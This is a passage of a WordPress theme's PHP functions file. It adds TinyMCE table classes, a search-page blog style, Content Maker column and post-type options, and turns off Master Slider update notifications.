        add_filter( 'ssba_html_output', 'volcanno_remove_ssba_from_content', 10, 2 );
    }


    if ( !function_exists( 'volcanno_add_tinymce_tables' ) ) {

        /**
         * Edit Tinymce settings i.e. add custom classes for Tables in Editor
         * 
         * @param array $settings Tinymce settings
         * @return array
         */
        function volcanno_add_tinymce_tables( $settings ) {
            $new_styles = array(
                array(
                    'title' => 'None',
                    'value' => ''
                ),
                array(
                    'title' => 'Events',
                    'value' => 'events-table',
                )
            );
            $settings['table_class_list'] = json_encode( $new_styles );
            return $settings;
        }

    }
    add_filter( 'tiny_mce_before_init', 'volcanno_add_tinymce_tables' );


    if ( !function_exists( 'volcanno_search_page_blog_style' ) ) {

        /**
         * Set blog style to "Large" for Search results page
         * 
         * @param string $style Blog style
         * @return string
         */
        function volcanno_search_page_blog_style( $style ) {

            // set Large blog style
            if ( is_search() ) {
                $style = 'blog-post-large';
            }

            return $style;
        }

    }
    add_filter( 'volcanno_blog_style', 'volcanno_search_page_blog_style' );


    if ( !function_exists( 'volcanno_cma_grid_options_fields' ) ) {

        /**
         * Filter Content Maker column field parameters
         * 
         * @param array $options Column field parameters
         */
        function volcanno_cma_grid_options_fields( $options ) {
            $options['classes']['options']['custom-col-padding-both'] = "Custom Column Paddings";

            return $options;
        }

    }
    add_filter( 'cma_grid_options_fields', 'volcanno_cma_grid_options_fields' );


    if ( !function_exists( 'volcanno_cma_settings_fields' ) ) {

        /**
         * Add available custom post types to Content Maker settings page. 
         * User can select which CPT will have Content Maker tab for editing the content.
         * 
         * @param string $sections
         * @return string
         */
        function volcanno_cma_settings_fields( $sections ) {
            $active_cpt_cma = array();

            // get active custom post types
            if ( VOLCANNO_CPTS && function_exists( 'vcpt_get_cpts' ) ) {
                $active_cpts = vcpt_get_cpts();

                foreach ( $active_cpts as $cpt_name => $active_cpt ) {
                    if ( $active_cpt['cpt'] == '1' ) {
                        $active_cpt_cma[] = $cpt_name;
                    }
                }
            }

            // find Content Maker tab
            $cma_index = cma_recursive_array_search( 'Content Maker', $sections );

            if ( isset( $cma_index[0] ) && !empty( $cma_index[0] ) ) {
                $cma_sections = $sections[$cma_index[0]]['fields'];

                // go through all fields of settings and replace array with available CPT's
                foreach ( $cma_sections as $index => $section ) {
                    if ( $section['id'] == 'cma_post_types' || $section['id'] == 'cma_prebuilt_post_types' ) {

                        // add default post types
                        $sections[$cma_index[0]]['fields'][$index]['options'] = array( 'post' => 'Posts', 'page' => 'Pages' );

                        if ( !empty( $active_cpt_cma ) ) {
                            // check if CPT name starts with 'pi_' and remove that part if it does
                            foreach ( $active_cpt_cma as $cpt_name ) {
                                if ( strpos( $cpt_name, 'pi_' ) === 0 ) {
                                    $cpt_name_clean = substr( $cpt_name, 3 );
                                }

                                $sections[$cma_index[0]]['fields'][$index]['options'][$cpt_name] = ucfirst( $cpt_name_clean );
                            }
                        }
                    }
                }
            }

            return $sections;
        }

    }

    add_filter( 'cma_settings_fields', 'volcanno_cma_settings_fields' );

    /**
     * Disabled Master Slider update notifications 
     * because user needs to have valid purchase code
     * 
     * @return string
     */
    function volcanno_disable_master_slider_update_notifications() {
        return true;
    }

    add_filter( 'masterslider_disable_auto_update', 'volcanno_disable_master_slider_update_notifications' );




    ?>